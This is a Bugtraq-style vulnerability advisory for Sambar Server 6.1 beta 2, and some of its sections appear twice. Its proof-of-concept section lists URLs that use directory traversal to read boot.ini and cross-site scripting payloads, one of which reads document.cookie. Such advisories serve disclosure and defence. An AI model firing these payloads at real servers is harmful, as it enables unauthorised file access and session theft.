Sambar Server Multiple Vulnerabilities
BID:10444
Info
Sambar Server Multiple Vulnerabilities
| Bugtraq ID: | 10444 |
| Class: | Unknown |
| CVE: |
CVE-2004-2564 CVE-2004-2565 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 01 2004 12:00AM |
| Updated: | Jul 12 2009 05:16AM |
| Credit: | Discovery is credited to Oliver Karow <[email protected]>. |
| Vulnerable: |
Sambar Server 6.1 beta 2 |
| Not Vulnerable: | |
Discussion
Sambar Server Multiple Vulnerabilities
Sambar Server is reportedly prone to multiple vulnerabilities. These issues may allow an attacker to access sensitive files and carry out directory traversal and cross-site scripting attacks.
These issues require an attacker to have administrative privileges, however, it is reported that an administrative password is not set on the server by default. An administrator who is not intended to have certain privileges may also exploit these vulnerabilities.
Sambar 6.1 Beta 2 is reported to be prone to these issues, however, it is likely that other versions are affected as well.
Sambar Server is reportedly prone to multiple vulnerabilities. These issues may allow an attacker to access sensitive files and carry out directory traversal and cross-site scripting attacks.
These issues require an attacker to have administrative privileges, however, it is reported that an administrative password is not set on the server by default. An administrator who is not intended to have certain privileges may also exploit these vulnerabilities.
Sambar 6.1 Beta 2 is reported to be prone to these issues, however, it is likely that other versions are affected as well.
Exploit / POC
Sambar Server Multiple Vulnerabilities
The following proof of concept is available:
http://www.example.com/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini
http://www.example.com/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y
http://www.example.com/sysadmin/system/show.asp?show=<script>alert("oops")</script>
http://www.example.com/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script>
The following proof of concept is available:
http://www.example.com/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini
http://www.example.com/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y
http://www.example.com/sysadmin/system/show.asp?show=<script>alert("oops")</script>
http://www.example.com/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script>
Solution / Fix
Sambar Server Multiple Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Sambar Server Multiple Vulnerabilities
References:
References:
- SAMBAR HomePage (SAMBAR)
- Sambar Proxy Multible Vulnerabilities (Oliver Karow)